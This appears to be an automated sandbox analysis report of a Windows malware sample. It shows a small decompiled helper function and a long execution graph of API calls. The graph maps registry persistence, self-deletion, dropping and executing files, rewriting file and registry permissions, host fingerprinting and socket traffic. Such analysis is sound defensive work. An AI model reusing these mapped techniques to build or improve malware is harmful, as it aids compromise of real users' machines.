						_t32 = _t99 + 1; // 0x1
						_t118 = _t32;
					}
					_t99 = _t99 + 1;
				} while (_t99 < _t64);
				goto L17;
				L23:
				E0040EE08(_t120,  &_v368, _t76 - _t103 + 1);
				_a12 = _a12 + 0x100;
				_t122 = _t124 + 0xc;
				_v8 = _v8 + 1;
				_t64 =  *_t116 - 1;
			} while (_v8 < _t64);
			goto L24;
		}
		_t3 = _t117 + 8; // 0x8
		_t105 = _t3;
		_t87 = _t3;
		_t4 = _t87 + 1; // 0x9
		_t115 = _t4;
		do {
			_t96 =  *_t87;
			_t87 = _t87 + 1;
		} while (_t96 != 0);
		E0040EE08(_a8, _t105, _t87 - _t115 + 1);
		 *_t116 =  *_t116 + 1;
		HeapFree(GetProcessHeap(), 0, _t117);
		goto L24;
	}
	return 0;
}
Address column for the C-Code listing above: 0x00402f2e - 0x0040307f (per-line alignment with the listing lost in extraction)
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00403003
                                                                                                                                  0x00403003
                                                                                                                                  0x0040300d
                                                                                                                                  0x0040300f
                                                                                                                                  0x0040300f
                                                                                                                                  0x0040300f
                                                                                                                                  0x00403012
                                                                                                                                  0x00403013
                                                                                                                                  0x00000000
                                                                                                                                  0x00403083
                                                                                                                                  0x0040308f
                                                                                                                                  0x00403094
                                                                                                                                  0x0040309d
                                                                                                                                  0x004030a0
                                                                                                                                  0x004030a3
                                                                                                                                  0x004030a4
                                                                                                                                  0x00000000
                                                                                                                                  0x00402ff7
                                                                                                                                  0x00402f4f
                                                                                                                                  0x00402f4f
                                                                                                                                  0x00402f52
                                                                                                                                  0x00402f54
                                                                                                                                  0x00402f54
                                                                                                                                  0x00402f57
                                                                                                                                  0x00402f57
                                                                                                                                  0x00402f59
                                                                                                                                  0x00402f5a
                                                                                                                                  0x00402f66
                                                                                                                                  0x00402f6e
                                                                                                                                  0x00402f7a
                                                                                                                                  0x00000000
                                                                                                                                  0x00402f7a
                                                                                                                                  0x00000000

APIs
  • Part of subcall function 00402D21: GetModuleHandleA.KERNEL32(00000000,7620EA30,?,00000000,00402F01,?,004020FF,00412000), ref: 00402D3A
  • Part of subcall function 00402D21: LoadLibraryA.KERNEL32(?), ref: 00402D4A
• GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402F73
• HeapFree.KERNEL32(00000000), ref: 00402F7A
Memory Dump Source
• Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
Yara matches
Similarity
• API ID: Heap$FreeHandleLibraryLoadModuleProcess
• String ID:
• API String ID: 1017166417-0
• Opcode ID: 3f77e5f90a98cb00e4cd81c42479f24e3707705fbe302646911da8b0c8861fdf
• Instruction ID: 68d3b74a61d8da24685d2c7d21854d87d7e5c343c8b3ec1e3967b08f84d9f298
• Opcode Fuzzy Hash: 3f77e5f90a98cb00e4cd81c42479f24e3707705fbe302646911da8b0c8861fdf
• Instruction Fuzzy Hash: C251E23190020A9FCF01DF64D8889FABB79FF15304F10457AEC95E7290E7769A19CB88
Uniqueness

Uniqueness Score: -1.00%

Execution Graph

Execution Coverage:14.6%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:0.7%
Total number of Nodes:1784
Total number of Limit Nodes:17
execution_graph (condensed): the raw dump lists every node as "<id> <address> [API names | N API calls]" followed by "<id>-><id>" edges, for code in the 0x2511xxx to 0x251fxxx range of the injected image; the dump breaks off mid-stream at node 6702 (251db89 lstrcpyA). It is condensed here to the API chains it records, with the node addresses as they appear in the dump:
• Entry chain: 2519a6b SetErrorMode, SetErrorMode, SetUnhandledExceptionFilter → 251ec54 GetSystemTimeAsFileTime, GetVolumeInformationA → 2519aa3 GetModuleHandleA, GetModuleFileNameA → 2519afd GetCommandLineA → 251a41c CreateThread, WSAStartup (with 251405e CreateEventA).
• Installation and persistence: 2519ca0 GetTempPathA; path building via 25199d2 lstrcpyA, 2519a2f/2519a4b lstrcatA and 2519d72 lstrcpyA, lstrcatA, lstrcatA; 2519f32 RegOpenKeyExA → 2519f48 RegSetValueExA, RegCloseKey; 251972d RegOpenKeyExA → 251974f RegDeleteValueA, RegCloseKey; 2519ff1 and 251a1b2 GetDriveTypeA; 251a0a4 wsprintfA with 251a02d/251a052/251a064/251a081 lstrcatA; 251a103 CreateProcessA → 251a12a DeleteFileA; 2519145 GetModuleHandleA, GetModuleFileNameA, CharToOemA → 251919e wsprintfA → 2519064 GetTempPathA → 25191d5 ShellExecuteA; 2519c05 ExitProcess.
• Self-deletion with retry: 251a406 DeleteFileA, on failure 251a3ed GetLastError → 251a3f8 Sleep → back to DeleteFileA; also 2519dde GetFileAttributesExA → 2519e0c DeleteFileA.
• Service registration: 251a39d StartServiceCtrlDispatcherA; 2519961 RegisterServiceCtrlHandlerA → 2519892 and 25198c2 SetServiceStatus.
• Networking: 251f483 WSAStartup; 251f26d setsockopt ×5; 251199c inet_addr, LoadLibraryA; 251c65c send, GetProcessHeap, HeapSize, GetProcessHeap, RtlAllocateHeap; 2516511 wsprintfA, IsBadReadPtr → 251656a htonl, htonl, wsprintfA, wsprintfA; closesocket at 251ca4b, 251cb60, 251dad2 and 251d569 (closesocket, Sleep); 251d582 ExitProcess.
• File drop and execution (251cb70 cluster): 251cc1c GetTempPathA; CreateFileA at 251cc9f, 251d15b, 251d2b1 and 251d3f2, each followed by WriteFile, CloseHandle (251ccc6, 251d182, 251d2d8, 251d415); SetFileAttributesA at 251d149, 251d1bf, 251d29f, 251d31d, 251d3e0 and 251d452; 251cfe3 and 251d027 GetSystemDirectoryA; 251cfad, 251d22d and 251d36e GetEnvironmentVariableA; 251d105, 251d26e and 251d3af lstrcatA; 251cd16 and 251d815 wsprintfA; 251d4b1 CreateProcessA → 251d4e8 CloseHandle, CloseHandle; 251cd81 WaitForSingleObject, CloseHandle, CloseHandle → 251cdbd DeleteFileA; 2516f5f GetUserNameA; 2518e26 GetSystemTime, SystemTimeToFileTime, CreateFileW, DeviceIoControl, CloseHandle.
• Configuration reads: 251e3ca RegOpenKeyExA → 251e434, 251e46e and 251e4b9 RegQueryValueExA → 251e51d RegCloseKey; 2518156 RegOpenKeyExA → 251816d and 25181aa RegQueryValueExA → 251820d RegCloseKey; 25194e8 RegOpenKeyExA → 251951f and 2519556 RegQueryValueExA → 251956e RegCloseKey; 251e555 GetFileSize → 251e576 ReadFile → 251e5b1 CloseHandle; in 251675c: 251677a/25167ba SetFileAttributesA, 2516784/25167a4 CreateFileA, 25167cf GetFileSize, ReadFile and SetFilePointer loop (25167ed, 2516811, 251682a, 2516848, 2516878, 2516900, 251690d), 251696e FindCloseChangeNotification; 2516a60 CreateFileA → 2516a8f GetDiskFreeSpaceA, with GetLastError, CloseHandle and 2516b7f DeleteFileA on the error paths.
• Loader-style sequence: 251643e and 251645b VirtualAlloc → 2516090 IsBadReadPtr, 25160c0 LoadLibraryA, 2516141 and 2516155 GetProcAddress, 2516191 IsBadReadPtr → 2515fbf VirtualProtect; teardown 2516281 FreeLibrary, 25162a0 VirtualFree.
• Crash handler: 2516511 → 251668a GetCurrentProcess, StackWalk64 → wsprintfA at 2516652, 25166a0, 25166da, 25166ed and 2516712 → 2516753 ExitProcess.
• Host fingerprinting: 2511db4 GetVersionExA → 2511dd0 GetSystemInfo, GetModuleHandleA, GetProcAddress → 2511e16 GetCurrentProcess; 2516cdc GetModuleHandleA, GetProcAddress → 2516d12 GetSystemDirectoryA → 2516d27 GetWindowsDirectoryA; 2516e02 GetVolumeInformationA; 251934a GetModuleHandleA, GetModuleFileNameA with wsprintfA at 25193c3, 2519401 and 251947e; 251e781 lstrcmpA; lstrcmpiA chain at 251be31, 251be55, 251be61, 251bf62, 251bf77 and 251bf8c.
• Timing loops: 2514e92 GetTickCount → 2514ec0 InterlockedExchange → 2514ead GetTickCount → 2514eb8 Sleep → back to 2514ec0; 251dd05 GetTickCount → 251dd41 InterlockedExchange, 251dd20/251dd53 GetCurrentThreadId, 251dd2e GetTickCount → 251dd39 Sleep; 251a49f and 251a4b7 GetTickCount with 251a4be Sleep; 2518dec Sleep.
• Pointer probes: IsBadWritePtr at 2514861, 2515b84, 2515c05, 2515c24, 2515d34 and 2515d93; IsBadReadPtr at 2516090, 2516191 and 2516511.
• Events and handles: 2514280 CreateEventA → 2513f18 WriteFile → CloseHandle at 251439f (×2), 25143ba and 25143c1.
• Folded helpers ("N API calls" nodes): 251ec2e GetProcessHeap, HeapSize, GetProcessHeap, RtlFreeHeap; 251eba0 → 251ec3d GetProcessHeap, RtlFreeHeap; 251f04e LoadLibraryA, GetProcAddress, SystemTimeToFileTime, GetSystemTimeAsFileTime; 251ebcc, 251ebed, 251e318, 251e8a1, 251ea84 and 251e819 appear only as call counts.
CreateFileA 6699->6702 6700->6669 6702->6669 6704 251ec01 6703->6704 6705 251ebf6 6703->6705 6715 251eba0 6704->6715 6712 251ebcc GetProcessHeap RtlAllocateHeap 6705->6712 6713 251eb74 2 API calls 6712->6713 6714 251ebe8 6713->6714 6714->6691 6716 251eba7 GetProcessHeap HeapSize 6715->6716 6717 251ebbf GetProcessHeap HeapReAlloc 6715->6717 6716->6717 6718 251eb74 6717->6718 6719 251eb7b GetProcessHeap HeapSize 6718->6719 6720 251eb93 6718->6720 6719->6720 6720->6691 6735 251eb41 6721->6735 6723 251f0b7 6723->6697 6725 251de3a 6724->6725 6731 251de4e 6725->6731 6744 251dd84 6725->6744 6728 251ebed 8 API calls 6733 251def6 6728->6733 6729 251de9e 6729->6728 6729->6731 6730 251de76 6748 251ddcf 6730->6748 6731->6697 6733->6731 6734 251ddcf lstrcmpA 6733->6734 6734->6731 6736 251eb61 6735->6736 6737 251eb4a 6735->6737 6736->6723 6740 251eae4 6737->6740 6739 251eb54 6739->6723 6739->6736 6741 251eb02 GetProcAddress 6740->6741 6742 251eaed LoadLibraryA 6740->6742 6741->6739 6742->6741 6743 251eb01 6742->6743 6743->6739 6745 251ddc5 6744->6745 6746 251dd96 6744->6746 6745->6729 6745->6730 6746->6745 6747 251ddad lstrcmpiA 6746->6747 6747->6745 6747->6746 6749 251dddd 6748->6749 6751 251de20 6748->6751 6750 251ddfa lstrcmpA 6749->6750 6749->6751 6750->6749 6751->6731 6753 251dd05 6 API calls 6752->6753 6754 251e821 6753->6754 6755 251dd84 lstrcmpiA 6754->6755 6756 251e82c 6755->6756 6757 251e844 6756->6757 6802 2512480 6756->6802 6757->6301 6760 251ea98 6759->6760 6811 251e8a1 6760->6811 6762 2511e84 6762->6309 6764 25119d5 GetProcAddress GetProcAddress GetProcAddress 6763->6764 6767 25119ce 6763->6767 6765 2511ab3 FreeLibrary 6764->6765 6766 2511a04 6764->6766 6765->6767 6766->6765 6768 2511a14 GetBestInterface GetProcessHeap 6766->6768 6767->6314 6768->6767 6769 2511a2e HeapAlloc 6768->6769 6769->6767 6770 2511a42 GetAdaptersInfo 6769->6770 6771 2511a62 6770->6771 6772 2511a52 HeapReAlloc 6770->6772 6773 2511aa1 FreeLibrary 6771->6773 6774 2511a69 GetAdaptersInfo 
6771->6774 6772->6771 6773->6767 6774->6773 6775 2511a75 HeapFree 6774->6775 6775->6773 6839 2511ac3 LoadLibraryA 6777->6839 6780 2511bcf 6780->6324 6782 2511ac3 13 API calls 6781->6782 6783 2511c09 6782->6783 6784 2511c5a 6783->6784 6785 2511c0d GetComputerNameA 6783->6785 6784->6334 6786 2511c45 GetVolumeInformationA 6785->6786 6787 2511c1f 6785->6787 6786->6784 6787->6786 6788 2511c41 6787->6788 6788->6784 6790 251ee2a 6789->6790 6791 25130d0 gethostname gethostbyname 6790->6791 6792 2511f82 6791->6792 6792->6338 6792->6339 6794 251dd05 6 API calls 6793->6794 6795 251df7c 6794->6795 6796 251dd84 lstrcmpiA 6795->6796 6797 251df89 6796->6797 6798 251ddcf lstrcmpA 6797->6798 6799 251ec2e codecvt 4 API calls 6797->6799 6800 251dd84 lstrcmpiA 6797->6800 6801 251dfc4 6797->6801 6798->6797 6799->6797 6800->6797 6801->6308 6805 2512419 lstrlenA 6802->6805 6804 2512491 6804->6757 6806 2512474 6805->6806 6807 251243d lstrlenA 6805->6807 6806->6804 6808 2512464 lstrlenA 6807->6808 6809 251244e lstrcmpiA 6807->6809 6808->6806 6808->6807 6809->6808 6810 251245c 6809->6810 6810->6806 6810->6808 6812 251dd05 6 API calls 6811->6812 6813 251e8b4 6812->6813 6814 251dd84 lstrcmpiA 6813->6814 6815 251e8c0 6814->6815 6816 251e8c8 lstrcpynA 6815->6816 6826 251e90a 6815->6826 6817 251e8f5 6816->6817 6832 251df4c 6817->6832 6818 2512419 4 API calls 6819 251e926 lstrlenA lstrlenA 6818->6819 6821 251e96a 6819->6821 6822 251e94c lstrlenA 6819->6822 6825 251ebcc 4 API calls 6821->6825 6827 251ea27 6821->6827 6822->6821 6823 251e901 6824 251dd84 lstrcmpiA 6823->6824 6824->6826 6828 251e98f 6825->6828 6826->6818 6826->6827 6827->6762 6828->6827 6829 251df4c 20 API calls 6828->6829 6830 251ea1e 6829->6830 6831 251ec2e codecvt 4 API calls 6830->6831 6831->6827 6833 251dd05 6 API calls 6832->6833 6834 251df51 6833->6834 6835 251f04e 4 API calls 6834->6835 6836 251df58 6835->6836 6837 251de24 10 API calls 6836->6837 6838 251df63 6837->6838 6838->6823 6840 2511ae2 GetProcAddress 6839->6840 6841 
2511b68 GetComputerNameA GetVolumeInformationA 6839->6841 6840->6841 6844 2511af5 6840->6844 6841->6780 6842 2511b1c GetAdaptersAddresses 6842->6844 6846 2511b29 6842->6846 6843 251ebed 8 API calls 6843->6844 6844->6842 6844->6843 6844->6846 6845 251ec2e codecvt 4 API calls 6845->6841 6846->6841 6846->6845 6846->6846 6848 2516ec3 2 API calls 6847->6848 6849 2517ef4 6848->6849 6859 2517fc9 6849->6859 6883 25173ff 6849->6883 6851 2517f16 6851->6859 6903 2517809 GetUserNameA 6851->6903 6853 2517f63 6853->6859 6927 251ef1e lstrlenA 6853->6927 6856 251ef1e lstrlenA 6857 2517fb7 6856->6857 6929 2517a95 RegOpenKeyExA 6857->6929 6859->6348 6861 2517073 6860->6861 6862 25170b9 RegOpenKeyExA 6861->6862 6863 25170d0 6862->6863 6877 25171b8 6862->6877 6864 2516dc2 6 API calls 6863->6864 6867 25170d5 6864->6867 6865 251719b RegEnumValueA 6866 25171af RegCloseKey 6865->6866 6865->6867 6866->6877 6867->6865 6869 25171d0 6867->6869 6960 251f1a5 lstrlenA 6867->6960 6870 2517205 RegCloseKey 6869->6870 6871 2517227 6869->6871 6870->6877 6872 25172b8 ___ascii_stricmp 6871->6872 6873 251728e RegCloseKey 6871->6873 6874 25172cd RegCloseKey 6872->6874 6875 25172dd 6872->6875 6873->6877 6874->6877 6876 2517311 RegCloseKey 6875->6876 6879 2517335 6875->6879 6876->6877 6877->6347 6878 25173d5 RegCloseKey 6880 25173e4 6878->6880 6879->6878 6881 251737e GetFileAttributesExA 6879->6881 6882 2517397 6879->6882 6881->6882 6882->6878 6884 251741b 6883->6884 6885 2516dc2 6 API calls 6884->6885 6886 251743f 6885->6886 6887 2517469 RegOpenKeyExA 6886->6887 6888 25177f9 6887->6888 6899 2517487 ___ascii_stricmp 6887->6899 6888->6851 6889 2517703 RegEnumKeyA 6890 2517714 RegCloseKey 6889->6890 6889->6899 6890->6888 6891 251f1a5 lstrlenA 6891->6899 6892 25174d2 RegOpenKeyExA 6892->6899 6893 251772c 6895 2517742 RegCloseKey 6893->6895 6896 251774b 6893->6896 6894 2517521 RegQueryValueExA 6894->6899 6895->6896 6897 25177ec RegCloseKey 6896->6897 6897->6888 6898 25176e4 RegCloseKey 6898->6899 6899->6889 
6899->6891 6899->6892 6899->6893 6899->6894 6899->6898 6900 2517769 6899->6900 6902 251777e GetFileAttributesExA 6899->6902 6901 25177e3 RegCloseKey 6900->6901 6901->6897 6902->6900 6904 251783d LookupAccountNameA 6903->6904 6905 2517a8d 6903->6905 6904->6905 6906 2517874 GetLengthSid GetFileSecurityA 6904->6906 6905->6853 6906->6905 6907 25178a8 GetSecurityDescriptorOwner 6906->6907 6908 25178c5 EqualSid 6907->6908 6909 251791d GetSecurityDescriptorDacl 6907->6909 6908->6909 6910 25178dc LocalAlloc 6908->6910 6909->6905 6916 2517941 6909->6916 6910->6909 6911 25178ef InitializeSecurityDescriptor 6910->6911 6912 2517916 LocalFree 6911->6912 6913 25178fb SetSecurityDescriptorOwner 6911->6913 6912->6909 6913->6912 6915 251790b SetFileSecurityA 6913->6915 6914 251795b GetAce 6914->6916 6915->6912 6916->6905 6916->6914 6917 2517980 EqualSid 6916->6917 6918 25179be EqualSid 6916->6918 6919 2517a3d 6916->6919 6921 251799d DeleteAce 6916->6921 6917->6916 6918->6916 6919->6905 6920 2517a43 LocalAlloc 6919->6920 6920->6905 6922 2517a56 InitializeSecurityDescriptor 6920->6922 6921->6916 6923 2517a62 SetSecurityDescriptorDacl 6922->6923 6924 2517a86 LocalFree 6922->6924 6923->6924 6925 2517a73 SetFileSecurityA 6923->6925 6924->6905 6925->6924 6926 2517a83 6925->6926 6926->6924 6928 2517fa6 6927->6928 6928->6856 6930 2517ac4 6929->6930 6931 2517acb GetUserNameA 6929->6931 6930->6859 6932 2517da7 RegCloseKey 6931->6932 6933 2517aed LookupAccountNameA 6931->6933 6932->6930 6933->6932 6934 2517b24 RegGetKeySecurity 6933->6934 6934->6932 6935 2517b49 GetSecurityDescriptorOwner 6934->6935 6936 2517b63 EqualSid 6935->6936 6937 2517bb8 GetSecurityDescriptorDacl 6935->6937 6936->6937 6938 2517b74 LocalAlloc 6936->6938 6939 2517da6 6937->6939 6946 2517bdc 6937->6946 6938->6937 6940 2517b8a InitializeSecurityDescriptor 6938->6940 6939->6932 6941 2517bb1 LocalFree 6940->6941 6942 2517b96 SetSecurityDescriptorOwner 6940->6942 6941->6937 6942->6941 6944 2517ba6 RegSetKeySecurity 6942->6944 
6943 2517bf8 GetAce 6943->6946 6944->6941 6945 2517c1d EqualSid 6945->6946 6946->6939 6946->6943 6946->6945 6947 2517cd9 6946->6947 6948 2517c5f EqualSid 6946->6948 6949 2517c3a DeleteAce 6946->6949 6947->6939 6950 2517d5a LocalAlloc 6947->6950 6951 2517cf2 RegOpenKeyExA 6947->6951 6948->6946 6949->6946 6950->6939 6952 2517d70 InitializeSecurityDescriptor 6950->6952 6951->6950 6957 2517d0f 6951->6957 6953 2517d7c SetSecurityDescriptorDacl 6952->6953 6954 2517d9f LocalFree 6952->6954 6953->6954 6955 2517d8c RegSetKeySecurity 6953->6955 6954->6939 6955->6954 6956 2517d9c 6955->6956 6956->6954 6958 2517d43 RegSetValueExA 6957->6958 6958->6950 6959 2517d54 6958->6959 6959->6950 6961 251f1c3 6960->6961 6961->6867 6963 251dd05 6 API calls 6962->6963 6966 251e65f 6963->6966 6964 251e6a5 6965 251ebcc 4 API calls 6964->6965 6972 251e6f5 6964->6972 6969 251e6b0 6965->6969 6966->6964 6968 251e68c lstrcmpA 6966->6968 6967 251e6b7 6967->6370 6968->6966 6969->6967 6971 251e6e0 lstrcpynA 6969->6971 6969->6972 6970 251e71d lstrcmpA 6970->6972 6971->6972 6972->6967 6972->6970 6974 2512692 inet_addr 6973->6974 6975 251268e 6973->6975 6974->6975 6976 251269e gethostbyname 6974->6976 6977 251f428 6975->6977 6976->6975 7125 251f315 6977->7125 6980 251f43e 6981 251f473 recv 6980->6981 6982 251f458 6981->6982 6983 251f47c 6981->6983 6982->6981 6982->6983 6983->6407 6985 251c525 6984->6985 6986 251c532 6984->6986 6985->6986 6988 251ec2e codecvt 4 API calls 6985->6988 6987 251c548 6986->6987 7138 251e7ff 6986->7138 6990 251e7ff lstrcmpiA 6987->6990 6996 251c54f 6987->6996 6988->6986 6991 251c615 6990->6991 6992 251ebcc 4 API calls 6991->6992 6991->6996 6992->6996 6993 251c5d1 6995 251ebcc 4 API calls 6993->6995 6995->6996 6996->6389 6997 251e819 11 API calls 6998 251c5b7 6997->6998 6999 251f04e 4 API calls 6998->6999 7000 251c5bf 6999->7000 7000->6987 7000->6993 7003 251c8d2 7001->7003 7002 251c907 7002->6391 7003->7002 7004 251c517 23 API calls 7003->7004 7004->7002 7006 251c670 
7005->7006 7007 251c67d 7005->7007 7008 251ebcc 4 API calls 7006->7008 7009 251ebcc 4 API calls 7007->7009 7010 251c699 7007->7010 7008->7007 7009->7010 7011 251c6f3 7010->7011 7012 251c73c send 7010->7012 7011->6420 7011->6485 7012->7011 7014 251c770 7013->7014 7015 251c77d 7013->7015 7016 251ebcc 4 API calls 7014->7016 7017 251c799 7015->7017 7018 251ebcc 4 API calls 7015->7018 7016->7015 7019 251c7b5 7017->7019 7021 251ebcc 4 API calls 7017->7021 7018->7017 7020 251f43e recv 7019->7020 7022 251c7cb 7020->7022 7021->7019 7023 251c7d3 7022->7023 7024 251f43e recv 7022->7024 7023->6485 7024->7023 7141 2517db7 7025->7141 7028 251f04e 4 API calls 7031 2517e4c 7028->7031 7029 2517e96 7029->6485 7030 2517e70 7030->7029 7032 251f04e 4 API calls 7030->7032 7031->7030 7033 251f04e 4 API calls 7031->7033 7032->7029 7033->7030 7035 2516ec3 2 API calls 7034->7035 7036 2517fdd 7035->7036 7037 25180c2 CreateProcessA 7036->7037 7038 25173ff 17 API calls 7036->7038 7037->6473 7037->6474 7039 2517fff 7038->7039 7039->7037 7040 2517809 21 API calls 7039->7040 7041 251804d 7040->7041 7041->7037 7042 251ef1e lstrlenA 7041->7042 7043 251809e 7042->7043 7044 251ef1e lstrlenA 7043->7044 7045 25180af 7044->7045 7046 2517a95 24 API calls 7045->7046 7046->7037 7048 2517db7 2 API calls 7047->7048 7049 2517eb8 7048->7049 7050 251f04e 4 API calls 7049->7050 7051 2517ece DeleteFileA 7050->7051 7051->6485 7053 251dd05 6 API calls 7052->7053 7054 251e31d 7053->7054 7145 251e177 7054->7145 7056 251e326 7056->6446 7058 25131f3 7057->7058 7068 25131ec 7057->7068 7059 251ebcc 4 API calls 7058->7059 7066 25131fc 7059->7066 7060 2513459 7063 251f04e 4 API calls 7060->7063 7061 251349d 7062 251ec2e codecvt 4 API calls 7061->7062 7062->7068 7064 251345f 7063->7064 7065 25130fa 4 API calls 7064->7065 7065->7068 7067 251ebcc GetProcessHeap HeapSize GetProcessHeap RtlAllocateHeap 7066->7067 7066->7068 7069 251344d 7066->7069 7072 251344b 7066->7072 7073 2513141 lstrcmpiA 7066->7073 7171 25130fa 
GetTickCount 7066->7171 7067->7066 7068->6485 7070 251ec2e codecvt 4 API calls 7069->7070 7070->7072 7072->7060 7072->7061 7073->7066 7075 25130fa 4 API calls 7074->7075 7076 2513c1a 7075->7076 7077 2513ce6 7076->7077 7176 2513a72 7076->7176 7077->6485 7080 2513a72 9 API calls 7082 2513c5e 7080->7082 7081 2513a72 9 API calls 7081->7082 7082->7077 7082->7081 7083 251ec2e GetProcessHeap HeapSize GetProcessHeap RtlFreeHeap codecvt 7082->7083 7083->7082 7085 2513a10 7084->7085 7086 25130fa 4 API calls 7085->7086 7087 2513a1a 7086->7087 7087->6485 7089 251dd05 6 API calls 7088->7089 7090 251e7be 7089->7090 7090->6485 7092 251c105 7091->7092 7093 251c07e wsprintfA 7091->7093 7092->6485 7185 251bfce 7093->7185 7095 251c0ef 7096 251bfce wsprintfA 7095->7096 7096->7092 7098 2517047 7097->7098 7099 2516f88 LookupAccountNameA 7097->7099 7098->6485 7101 2517025 7099->7101 7102 2516fcb 7099->7102 7187 2516edd 7101->7187 7104 2516fdb ConvertSidToStringSidA 7102->7104 7104->7101 7106 2516ff1 7104->7106 7107 2517013 LocalFree 7106->7107 7107->7101 7109 251dd05 6 API calls 7108->7109 7110 251e85c 7109->7110 7111 251dd84 lstrcmpiA 7110->7111 7112 251e867 7111->7112 7113 251e885 lstrcpyA 7112->7113 7198 25124a5 7112->7198 7201 251dd69 7113->7201 7119 2517db7 2 API calls 7118->7119 7120 2517de1 7119->7120 7121 251f04e 4 API calls 7120->7121 7124 2517e16 7120->7124 7122 2517df2 7121->7122 7123 251f04e 4 API calls 7122->7123 7122->7124 7123->7124 7124->6485 7126 251ca1d 7125->7126 7127 251f33b 7125->7127 7126->6404 7126->6980 7128 251f347 htons socket 7127->7128 7129 251f382 ioctlsocket 7128->7129 7130 251f374 closesocket 7128->7130 7131 251f3aa connect select 7129->7131 7132 251f39d 7129->7132 7130->7126 7131->7126 7134 251f3f2 __WSAFDIsSet 7131->7134 7133 251f39f closesocket 7132->7133 7133->7126 7134->7133 7135 251f403 ioctlsocket 7134->7135 7137 251f26d setsockopt setsockopt setsockopt setsockopt setsockopt 7135->7137 7137->7126 7139 251dd84 lstrcmpiA 7138->7139 7140 251c58e 
7139->7140 7140->6987 7140->6993 7140->6997 7142 2517dc8 InterlockedExchange 7141->7142 7143 2517dc0 Sleep 7142->7143 7144 2517dd4 7142->7144 7143->7142 7144->7028 7144->7030 7146 251e184 7145->7146 7147 251e2e4 7146->7147 7148 251e223 7146->7148 7161 251dfe2 7146->7161 7147->7056 7148->7147 7150 251dfe2 8 API calls 7148->7150 7155 251e23c 7150->7155 7151 251e1be 7151->7148 7152 251dbcf 3 API calls 7151->7152 7154 251e1d6 7152->7154 7153 251e21a CloseHandle 7153->7148 7154->7148 7154->7153 7156 251e1f9 WriteFile 7154->7156 7155->7147 7165 251e095 RegCreateKeyExA 7155->7165 7156->7153 7158 251e213 7156->7158 7158->7153 7159 251e2a3 7159->7147 7160 251e095 4 API calls 7159->7160 7160->7147 7162 251dffc 7161->7162 7164 251e024 7161->7164 7163 251db2e 8 API calls 7162->7163 7162->7164 7163->7164 7164->7151 7166 251e172 7165->7166 7168 251e0c0 7165->7168 7166->7159 7167 251e13d 7169 251e14e RegDeleteValueA RegCloseKey 7167->7169 7168->7167 7170 251e115 RegSetValueExA 7168->7170 7169->7166 7170->7167 7170->7168 7172 2513122 InterlockedExchange 7171->7172 7173 251310f GetTickCount 7172->7173 7174 251312e 7172->7174 7173->7174 7175 251311a Sleep 7173->7175 7174->7066 7175->7172 7177 251f04e 4 API calls 7176->7177 7178 2513a83 7177->7178 7182 2513bc0 7178->7182 7183 2513b66 lstrlenA 7178->7183 7184 2513ac1 7178->7184 7179 2513be6 7181 251ec2e codecvt 4 API calls 7179->7181 7180 251ec2e GetProcessHeap HeapSize GetProcessHeap RtlFreeHeap codecvt 7180->7182 7181->7184 7182->7179 7182->7180 7183->7178 7183->7184 7184->7077 7184->7080 7186 251bfd6 wsprintfA 7185->7186 7186->7095 7188 2516f55 wsprintfA 7187->7188 7189 2516eef AllocateAndInitializeSid 7187->7189 7188->7098 7190 2516f44 7189->7190 7191 2516f1c CheckTokenMembership 7189->7191 7190->7188 7195 2516e36 GetUserNameW 7190->7195 7192 2516f3b FreeSid 7191->7192 7193 2516f2e 7191->7193 7192->7190 7193->7192 7196 2516e5f LookupAccountNameW 7195->7196 7197 2516e97 7195->7197 7196->7197 7197->7188 7199 2512419 4 API calls 
7198->7199 7200 25124b6 7199->7200 7200->7113 7202 251dd79 lstrlenA 7201->7202 7202->6485 7204 251eb17 7203->7204 7206 251eb21 7203->7206 7205 251eae4 2 API calls 7204->7205 7205->7206 7206->6531 7209 25169b9 WriteFile 7207->7209 7210 25169ff 7209->7210 7211 2516a3c 7209->7211 7210->7211 7212 2516a10 WriteFile 7210->7212 7211->6527 7211->6528 7212->7210 7212->7211 7214 2513ee2 7213->7214 7215 2513edc 7213->7215 7214->6542 7216 2516dc2 6 API calls 7215->7216 7216->7214 7218 251400b CreateFileA 7217->7218 7219 2514052 7218->7219 7220 251402c GetLastError 7218->7220 7219->6545 7220->7219 7221 2514037 7220->7221 7221->7219 7222 2514041 Sleep 7221->7222 7222->7218 7222->7219 7224 2513f4e GetLastError 7223->7224 7226 2513f7c 7223->7226 7225 2513f5b WaitForSingleObject GetOverlappedResult 7224->7225 7224->7226 7225->7226 7227 2513f8c ReadFile 7226->7227 7228 2513fc2 GetLastError 7227->7228 7230 2513ff0 7227->7230 7229 2513fcf WaitForSingleObject GetOverlappedResult 7228->7229 7228->7230 7229->7230 7230->6550 7230->6551 7232 2511924 GetVersionExA 7231->7232 7232->6590 7234 251f0f1 7233->7234 7235 251f0ed 7233->7235 7236 251f119 7234->7236 7237 251f0fa lstrlenA SysAllocStringByteLen 7234->7237 7235->6622 7239 251f11c MultiByteToWideChar 7236->7239 7238 251f117 7237->7238 7237->7239 7238->6622 7239->7238 7241 2511820 17 API calls 7240->7241 7243 25118f2 7241->7243 7242 25118f9 7242->6616 7243->7242 7257 2511280 7243->7257 7245 2511908 7245->6616 7270 2511000 7246->7270 7248 2511839 7249 2511851 GetCurrentProcess 7248->7249 7250 251183d 7248->7250 7251 2511864 7249->7251 7250->6609 7251->6609 7253 2519308 7252->7253 7255 251920e 7252->7255 7253->6616 7254 25192f1 Sleep 7254->7255 7255->7253 7255->7254 7255->7255 7256 25192bf ShellExecuteA 7255->7256 7256->7253 7256->7255 7259 25112e1 7257->7259 7258 2511373 ShellExecuteExW 7260 25116f9 GetLastError 7258->7260 7266 25113a8 7258->7266 7259->7258 7259->7259 7269 2511699 7260->7269 7261 2511570 lstrlenW 7261->7266 7262 25115be 
